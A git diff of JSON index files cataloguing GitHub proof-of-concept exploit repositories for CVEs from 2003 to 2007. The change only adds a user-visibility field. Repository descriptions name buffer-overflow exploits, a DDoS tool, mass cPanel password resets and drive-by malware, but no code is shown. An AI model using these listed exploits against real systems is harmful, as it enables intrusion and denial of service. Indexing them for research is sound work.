"https:\/\/github.com\/fyoderxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fyoderxx\/slmail-exploit", "description": "Exploit SLmail Buffer Overflow CVE-2003-0264", @@ -67,7 +69,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2003-0264", "description": "CVE-2003-0264 - SLMail 5.5 POP3 'PASS' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", @@ -97,7 +100,8 @@ "login": "pwncone", "id": 57570315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57570315?v=4", - "html_url": "https:\/\/github.com\/pwncone" + "html_url": "https:\/\/github.com\/pwncone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwncone\/CVE-2003-0264-SLmail-5.5", "description": "A POC remote buffer overflow for CVE-2003-0264 - SLMail 5.5", @@ -127,7 +131,8 @@ "login": "vrikodar", "id": 73271976, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73271976?v=4", - "html_url": "https:\/\/github.com\/vrikodar" + "html_url": "https:\/\/github.com\/vrikodar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vrikodar\/CVE-2003-0264_EXPLOIT", "description": "Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3", @@ -166,7 +171,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2003-0264", "description": "CVE-2003-0264 SLMail5.5_RemoteBufferOverflow", diff --git a/2003/CVE-2003-0282.json b/2003/CVE-2003-0282.json index c3ffc13864..f983054a72 100644 --- a/2003/CVE-2003-0282.json +++ b/2003/CVE-2003-0282.json @@ -7,7 +7,8 @@ "login": "silasol", "id": 24622986, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24622986?v=4", - "html_url": "https:\/\/github.com\/silasol" + "html_url": "https:\/\/github.com\/silasol", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/silasol\/cve-2003-0282", "description": null, diff --git a/2003/CVE-2003-0358.json b/2003/CVE-2003-0358.json index 472f194aab..f5c2a56da5 100644 --- a/2003/CVE-2003-0358.json +++ b/2003/CVE-2003-0358.json @@ -7,7 +7,8 @@ "login": "gmh5225", "id": 13917777, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", - "html_url": "https:\/\/github.com\/gmh5225" + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gmh5225\/CVE-2003-0358", "description": "By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.", @@ -37,7 +38,8 @@ "login": "fengjixuchui", "id": 2487206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", - "html_url": "https:\/\/github.com\/fengjixuchui" + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2003-0358", "description": "By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.", diff --git a/2004/CVE-2004-0558.json b/2004/CVE-2004-0558.json index 320de2ce6f..8ff8f119f4 100644 --- a/2004/CVE-2004-0558.json +++ b/2004/CVE-2004-0558.json @@ -7,7 +7,8 @@ "login": "fibonascii", "id": 11827510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11827510?v=4", - "html_url": "https:\/\/github.com\/fibonascii" + "html_url": "https:\/\/github.com\/fibonascii", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fibonascii\/CVE-2004-0558", "description": null, diff --git a/2004/CVE-2004-1561.json b/2004/CVE-2004-1561.json index 9b279b7292..41c62858ca 100644 --- a/2004/CVE-2004-1561.json +++ b/2004/CVE-2004-1561.json @@ -7,7 +7,8 @@ "login": "ivanitlearning", "id": 52420671, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52420671?v=4", - "html_url": "https:\/\/github.com\/ivanitlearning" + "html_url": "https:\/\/github.com\/ivanitlearning", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ivanitlearning\/CVE-2004-1561", "description": "Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32)", @@ -37,7 +38,8 @@ "login": "ratiros01", "id": 14090955, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14090955?v=4", - "html_url": "https:\/\/github.com\/ratiros01" + "html_url": "https:\/\/github.com\/ratiros01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ratiros01\/CVE-2004-1561", "description": null, @@ -67,7 +69,8 @@ "login": "darrynb89", "id": 23241437, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23241437?v=4", - "html_url": "https:\/\/github.com\/darrynb89" + "html_url": "https:\/\/github.com\/darrynb89", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/darrynb89\/CVE-2004-1561", "description": "Python version of Metasploit exploit for CVE-2004-1561", @@ -97,7 +100,8 @@ "login": "thel1nus", "id": 77783022, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77783022?v=4", - "html_url": "https:\/\/github.com\/thel1nus" + "html_url": "https:\/\/github.com\/thel1nus", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thel1nus\/CVE-2004-1561-Notes", "description": "My notes for CVE-2004-1561 IceCast exploitation", diff --git a/2004/CVE-2004-1769.json b/2004/CVE-2004-1769.json index 5729c11d73..9fadeee66e 100644 --- a/2004/CVE-2004-1769.json +++ b/2004/CVE-2004-1769.json @@ -7,7 +7,8 @@ "login": "sinkaroid", "id": 12372481, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12372481?v=4", - "html_url": "https:\/\/github.com\/sinkaroid" + "html_url": "https:\/\/github.com\/sinkaroid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sinkaroid\/shiguresh", "description": "CVE-2004-1769 cPanel Resetpass Remote Command Execution", @@ -40,7 +41,8 @@ "login": "Redsplit", "id": 65139960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65139960?v=4", - "html_url": "https:\/\/github.com\/Redsplit" + "html_url": "https:\/\/github.com\/Redsplit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Redsplit\/shiguresh", "description": "CVE-2004-1769 \/\/ Mass cPanel Reset password", diff --git a/2004/CVE-2004-2167.json b/2004/CVE-2004-2167.json index e109251fd2..3f66ae03ad 100644 --- a/2004/CVE-2004-2167.json +++ b/2004/CVE-2004-2167.json @@ -7,7 +7,8 @@ "login": "uzzzval", "id": 7476462, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7476462?v=4", - "html_url": "https:\/\/github.com\/uzzzval" + "html_url": "https:\/\/github.com\/uzzzval", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uzzzval\/cve-2004-2167", "description": null, diff --git a/2004/CVE-2004-2271.json b/2004/CVE-2004-2271.json index 33bf1afe28..500ef1833c 100644 --- a/2004/CVE-2004-2271.json +++ b/2004/CVE-2004-2271.json @@ -7,7 +7,8 @@ "login": "kkirsche", "id": 947110, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/947110?v=4", - "html_url": "https:\/\/github.com\/kkirsche" + "html_url": "https:\/\/github.com\/kkirsche", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kkirsche\/CVE-2004-2271", "description": "Minishare 1.4.1 Remote Buffer Overflow", @@ -37,7 +38,8 @@ "login": "PercussiveElbow", "id": 10052381, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10052381?v=4", - "html_url": "https:\/\/github.com\/PercussiveElbow" + "html_url": "https:\/\/github.com\/PercussiveElbow", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/PercussiveElbow\/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow", "description": null, @@ -67,7 +69,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2004-2271", "description": "CVE-2004-2271 - Minishare 1.4.1 HTTP Server Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", @@ -97,7 +100,8 @@ "login": "pwncone", "id": 57570315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57570315?v=4", - "html_url": "https:\/\/github.com\/pwncone" + "html_url": "https:\/\/github.com\/pwncone", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pwncone\/CVE-2004-2271-MiniShare-1.4.1-BOF", "description": "A python implementation of CVE-2004-2271 targeting MiniShare 1.4.1.", diff --git a/2004/CVE-2004-2449.json b/2004/CVE-2004-2449.json index 0e2b8db97d..ceff3f7bfd 100644 --- a/2004/CVE-2004-2449.json +++ b/2004/CVE-2004-2449.json @@ -7,7 +7,8 @@ "login": "ParallelVisions", "id": 70821640, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70821640?v=4", - "html_url": "https:\/\/github.com\/ParallelVisions" + "html_url": "https:\/\/github.com\/ParallelVisions", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ParallelVisions\/DoSTool", "description": "DDoS Tool which exploits vulnerability CVE-2004-2449 from vendor GameSpy (now known as OpenSpy). User is prompted for input IP address, and port. (NOTE: Please use this responsibly, I made this as a proof of concept of vulnerability exploitation ONLY. I do not endorse DOSing, DDoSing, or cheating in any way. Use this at your own risk.)", diff --git a/2004/CVE-2004-2549.json b/2004/CVE-2004-2549.json index e0ce28c0bd..a5a97a9115 100644 --- a/2004/CVE-2004-2549.json +++ b/2004/CVE-2004-2549.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2004-2549", "description": "Nortel Wireless LAN Access Point 2200 Series - Denial of Service", diff --git a/2004/CVE-2004-2687.json b/2004/CVE-2004-2687.json index a3df7de335..402c08c6dc 100644 --- a/2004/CVE-2004-2687.json +++ b/2004/CVE-2004-2687.json @@ -7,7 +7,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/distccd_rce_CVE-2004-2687", "description": null, @@ -37,7 +38,8 @@ "login": "k4miyo", "id": 49828037, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49828037?v=4", - "html_url": "https:\/\/github.com\/k4miyo" + "html_url": "https:\/\/github.com\/k4miyo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/k4miyo\/CVE-2004-2687", "description": "CVE-2004-2687 DistCC Daemon Command Execution", @@ -67,7 +69,8 @@ "login": "ss0wl", "id": 61596312, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61596312?v=4", - "html_url": "https:\/\/github.com\/ss0wl" + "html_url": "https:\/\/github.com\/ss0wl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ss0wl\/CVE-2004-2687_distcc_v1", "description": "Remote Command Execution exploit for vulnerability CVE-2004-2687 in DistCC Daemon v1", diff --git a/2004/CVE-2004-6768.json b/2004/CVE-2004-6768.json index afd500ed08..673787d75a 100644 --- a/2004/CVE-2004-6768.json +++ b/2004/CVE-2004-6768.json @@ -7,7 +7,8 @@ "login": "yougboiz", "id": 133153602, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133153602?v=4", - "html_url": "https:\/\/github.com\/yougboiz" + "html_url": "https:\/\/github.com\/yougboiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/yougboiz\/Metasploit-CVE-2004-6768", "description": null, diff --git a/2005/CVE-2005-0575.json b/2005/CVE-2005-0575.json index a13c6faee9..8f1427741b 100644 --- a/2005/CVE-2005-0575.json +++ b/2005/CVE-2005-0575.json @@ -7,7 +7,8 @@ "login": "3t3rn4lv01d", "id": 78852098, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78852098?v=4", - "html_url": "https:\/\/github.com\/3t3rn4lv01d" + "html_url": "https:\/\/github.com\/3t3rn4lv01d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/3t3rn4lv01d\/CVE-2005-0575", "description": "Exploit for KNet 1.04b Web Server Buffer Overflow SEH", diff --git a/2005/CVE-2005-0603.json b/2005/CVE-2005-0603.json index 134fc4465c..9edbcce907 100644 --- a/2005/CVE-2005-0603.json +++ b/2005/CVE-2005-0603.json @@ -7,7 +7,8 @@ "login": "Parcer0", "id": 70012338, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70012338?v=4", - "html_url": "https:\/\/github.com\/Parcer0" + "html_url": "https:\/\/github.com\/Parcer0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Parcer0\/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure", "description": null, diff --git a/2005/CVE-2005-1125.json b/2005/CVE-2005-1125.json index ec886b4a77..ff967569dd 100644 --- a/2005/CVE-2005-1125.json +++ b/2005/CVE-2005-1125.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/libsafe-CVE-2005-1125", "description": "Libsafe - Safety Check Bypass Vulnerability (Proof of Concept Exploit & Time Randomization to Thwart It)", diff --git a/2005/CVE-2005-1794.json b/2005/CVE-2005-1794.json index c0425fef15..1151492381 100644 --- a/2005/CVE-2005-1794.json +++ b/2005/CVE-2005-1794.json @@ -7,7 +7,8 @@ "login": "InitRoot", "id": 954507, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/954507?v=4", - "html_url": "https:\/\/github.com\/InitRoot" + "html_url": "https:\/\/github.com\/InitRoot", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/InitRoot\/CVE-2005-1794Scanner", "description": "Scanner for network for CVE-2005-1794.", diff --git a/2005/CVE-2005-2428.json b/2005/CVE-2005-2428.json index 134c8d301b..a2f9ffdda7 100644 --- a/2005/CVE-2005-2428.json +++ b/2005/CVE-2005-2428.json @@ -7,7 +7,8 @@ "login": "schwankner", "id": 1496765, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1496765?v=4", - "html_url": "https:\/\/github.com\/schwankner" + "html_url": "https:\/\/github.com\/schwankner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/schwankner\/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit", "description": "IBM Lotus Domino <= R8 Password Hash Extraction Exploit", diff --git a/2005/CVE-2005-3299.json b/2005/CVE-2005-3299.json index a241c17d26..9948927d9c 100644 --- a/2005/CVE-2005-3299.json +++ b/2005/CVE-2005-3299.json @@ -7,7 +7,8 @@ "login": "RizeKishimaro", "id": 75617768, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75617768?v=4", - "html_url": "https:\/\/github.com\/RizeKishimaro" + "html_url": "https:\/\/github.com\/RizeKishimaro", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RizeKishimaro\/CVE-2005-3299", "description": "CVE 2005 exploit.Perl in Perl.", @@ -37,7 +38,8 @@ "login": "Cr0w-ui", "id": 173009007, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173009007?v=4", - "html_url": "https:\/\/github.com\/Cr0w-ui" + "html_url": "https:\/\/github.com\/Cr0w-ui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cr0w-ui\/-CVE-2005-3299-", "description": " phpMyAdmin 2.6.4-pl1 - Directory Traversal", diff --git a/2006/CVE-2006-0450.json b/2006/CVE-2006-0450.json index a975a46f8c..a0f6d9cffe 100644 --- a/2006/CVE-2006-0450.json +++ b/2006/CVE-2006-0450.json @@ -7,7 +7,8 @@ "login": "Parcer0", "id": 70012338, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70012338?v=4", - "html_url": "https:\/\/github.com\/Parcer0" + "html_url": "https:\/\/github.com\/Parcer0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Parcer0\/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities", "description": "CVE-2006-0450. phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.", diff --git a/2006/CVE-2006-0987.json b/2006/CVE-2006-0987.json index 745cc32f1b..377d2e8fec 100644 --- a/2006/CVE-2006-0987.json +++ b/2006/CVE-2006-0987.json @@ -7,7 +7,8 @@ "login": "pcastagnaro", "id": 8824742, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8824742?v=4", - "html_url": "https:\/\/github.com\/pcastagnaro" + "html_url": "https:\/\/github.com\/pcastagnaro", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pcastagnaro\/dns_amplification_scanner", "description": "This script checks if each domain from a given domain list is vulnerable to CVE-2006-0987", diff --git a/2006/CVE-2006-1236.json b/2006/CVE-2006-1236.json index 0a18b3e9b1..03cacf3a97 100644 --- a/2006/CVE-2006-1236.json +++ b/2006/CVE-2006-1236.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2006-1236", "description": "Exploit script for Crossfire 1.9.0", diff --git a/2006/CVE-2006-20001.json b/2006/CVE-2006-20001.json index 6d1efc4ba5..7db70842a5 100644 --- a/2006/CVE-2006-20001.json +++ b/2006/CVE-2006-20001.json @@ -7,7 +7,8 @@ "login": "Saksham2002", "id": 31695520, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31695520?v=4", - "html_url": "https:\/\/github.com\/Saksham2002" + "html_url": "https:\/\/github.com\/Saksham2002", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Saksham2002\/CVE-2006-20001", "description": "A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier. CVE project by @Sn0wAlice", diff --git a/2006/CVE-2006-2842.json b/2006/CVE-2006-2842.json index ae43fb796c..37f3e3fdde 100644 --- a/2006/CVE-2006-2842.json +++ b/2006/CVE-2006-2842.json @@ -7,7 +7,8 @@ "login": "karthi-the-hacker", "id": 33289300, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", - "html_url": "https:\/\/github.com\/karthi-the-hacker" + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2006-2842", "description": "CVE-2006-2842 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.", diff --git a/2006/CVE-2006-3392.json b/2006/CVE-2006-3392.json index 61756bf938..f76d4f6e49 100644 --- a/2006/CVE-2006-3392.json +++ b/2006/CVE-2006-3392.json @@ -7,7 +7,8 @@ "login": "0xtz", "id": 53442065, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53442065?v=4", - "html_url": "https:\/\/github.com\/0xtz" + "html_url": "https:\/\/github.com\/0xtz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xtz\/CVE-2006-3392", "description": "Webmin < 1.290 \/ Usermin < 1.220 - Arbitrary File Disclosure (Python3)", @@ -37,7 +38,8 @@ "login": "IvanGlinkin", "id": 64857726, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64857726?v=4", - "html_url": "https:\/\/github.com\/IvanGlinkin" + "html_url": "https:\/\/github.com\/IvanGlinkin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/IvanGlinkin\/CVE-2006-3392", "description": "This small script helps to avoid using MetaSploit (msfconsole) during the Enterprise pentests and OSCP-like exams. Grep included function will help you to get only the important information.", @@ -67,7 +69,8 @@ "login": "Adel-kaka-dz", "id": 65834056, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65834056?v=4", - "html_url": "https:\/\/github.com\/Adel-kaka-dz" + "html_url": "https:\/\/github.com\/Adel-kaka-dz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Adel-kaka-dz\/CVE-2006-3392", "description": "It is a simple tool to exploit local file include . vulnerabilities", @@ -97,7 +100,8 @@ "login": "gb21oc", "id": 66036094, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66036094?v=4", - "html_url": "https:\/\/github.com\/gb21oc" + "html_url": "https:\/\/github.com\/gb21oc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gb21oc\/ExploitWebmin", "description": "Python script to exploit webmin vulnerability cve-2006-3392", @@ -127,7 +131,8 @@ "login": "kernel-cyber", "id": 21226709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4", - "html_url": "https:\/\/github.com\/kernel-cyber" + "html_url": "https:\/\/github.com\/kernel-cyber", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2006-3392", "description": "Webmin Local File Include (unauthenticated)", @@ -157,7 +162,8 @@ "login": "g1vi", "id": 120142960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", - "html_url": "https:\/\/github.com\/g1vi" + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g1vi\/CVE-2006-3392", "description": "Webmin < 1.290 \/ Usermin < 1.220 - Arbitrary file disclosure", @@ -187,7 +193,8 @@ "login": "MrEmpy", "id": 71796063, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4", - "html_url": "https:\/\/github.com\/MrEmpy" + "html_url": "https:\/\/github.com\/MrEmpy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MrEmpy\/CVE-2006-3392", "description": null, diff --git a/2006/CVE-2006-3592.json b/2006/CVE-2006-3592.json index b79490375c..be669b5b72 100644 --- a/2006/CVE-2006-3592.json +++ b/2006/CVE-2006-3592.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2006-3592", "description": "Exploit for Easy File Sharing FTP Server 3.5 on Win7 32", diff --git a/2006/CVE-2006-3747.json b/2006/CVE-2006-3747.json index 888b37e9b0..f5d569cc8d 100644 --- a/2006/CVE-2006-3747.json +++ b/2006/CVE-2006-3747.json @@ -7,7 +7,8 @@ "login": "defensahacker", "id": 23421429, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23421429?v=4", - "html_url": "https:\/\/github.com\/defensahacker" + "html_url": "https:\/\/github.com\/defensahacker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/defensahacker\/CVE-2006-3747", "description": "Information about my advisory on CVE-2006-3747 (Apache mod_rewrite LDAP off-by-one buffer overflow).. At the time, it was the first public working exploit :)", diff --git a/2006/CVE-2006-4777.json b/2006/CVE-2006-4777.json index 44040e42d3..6565528b50 100644 --- a/2006/CVE-2006-4777.json +++ b/2006/CVE-2006-4777.json @@ -7,7 +7,8 @@ "login": "Mario1234", "id": 30897590, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30897590?v=4", - "html_url": "https:\/\/github.com\/Mario1234" + "html_url": "https:\/\/github.com\/Mario1234", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Mario1234\/js-driveby-download-CVE-2006-4777", "description": "malware del lado del cliente de explotacion de vulnerabilidad de internet explorer 6.0 SP1 en windows xp SP2. No requiere de consentimiento por parte del usuario y no descarga ningun archivo", diff --git a/2006/CVE-2006-4814.json b/2006/CVE-2006-4814.json index cfe611a562..1a14edd563 100644 --- a/2006/CVE-2006-4814.json +++ b/2006/CVE-2006-4814.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/linux-CVE-2006-4814", "description": "A deadlock on the mmap semaphore ‘mmap sem’ in the CentOS 3.9 kernel, that is triggered by a specific interleaving of concurrent threads, one calling the mmap system call and the other calling the mincore system call.", diff --git a/2006/CVE-2006-5051.json b/2006/CVE-2006-5051.json index e2bea142b6..b6e503197b 100644 --- a/2006/CVE-2006-5051.json +++ b/2006/CVE-2006-5051.json @@ -7,7 +7,8 @@ "login": "bigb0x", "id": 13532434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", - "html_url": "https:\/\/github.com\/bigb0x" + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", @@ -43,7 +44,8 @@ "login": "sardine-web", "id": 80635620, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80635620?v=4", - "html_url": "https:\/\/github.com\/sardine-web" + "html_url": "https:\/\/github.com\/sardine-web", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sardine-web\/CVE-2024-6387_Check", "description": "A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead to sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.", @@ -73,7 +75,8 @@ "login": "ThemeHackers", "id": 107047730, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", - "html_url": "https:\/\/github.com\/ThemeHackers" + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-6387", "description": "CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.", diff --git a/2006/CVE-2006-6184.json b/2006/CVE-2006-6184.json index 3e73cb653b..c74072f220 100644 --- a/2006/CVE-2006-6184.json +++ b/2006/CVE-2006-6184.json @@ -7,7 +7,8 @@ "login": "shauntdergrigorian", "id": 7718028, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7718028?v=4", - "html_url": "https:\/\/github.com\/shauntdergrigorian" + "html_url": "https:\/\/github.com\/shauntdergrigorian", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shauntdergrigorian\/cve-2006-6184", "description": "This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.", @@ -37,7 +38,8 @@ "login": "b03902043", "id": 9023845, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9023845?v=4", - "html_url": "https:\/\/github.com\/b03902043" + "html_url": "https:\/\/github.com\/b03902043", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b03902043\/CVE-2006-6184", "description": "simplified version of https:\/\/github.com\/shauntdergrigorian\/cve-2006-6184", diff --git a/2007/CVE-2007-0038.json b/2007/CVE-2007-0038.json index b4bc546a0a..4dd59a3fba 100644 --- a/2007/CVE-2007-0038.json +++ b/2007/CVE-2007-0038.json @@ -7,7 +7,8 @@ "login": "Axua", "id": 28788087, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28788087?v=4", - "html_url": "https:\/\/github.com\/Axua" + "html_url": "https:\/\/github.com\/Axua", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Axua\/CVE-2007-0038", "description": "IE7 buffer overflow through an ANI file", diff --git a/2007/CVE-2007-0843.json b/2007/CVE-2007-0843.json index 6497edae84..6aa6436408 100644 --- a/2007/CVE-2007-0843.json +++ b/2007/CVE-2007-0843.json @@ -7,7 +7,8 @@ "login": "z3APA3A", "id": 7222768, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7222768?v=4", - "html_url": "https:\/\/github.com\/z3APA3A" + "html_url": "https:\/\/github.com\/z3APA3A", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/z3APA3A\/spydir", "description": "Spydir is a small utility to monitor file changes in Windows directory regardless of subdirectory and files permissions (exploits CVE-2007-0843)", diff --git a/2007/CVE-2007-1567.json b/2007/CVE-2007-1567.json index 039c3e14b2..f82e031b9e 100644 --- a/2007/CVE-2007-1567.json +++ b/2007/CVE-2007-1567.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, 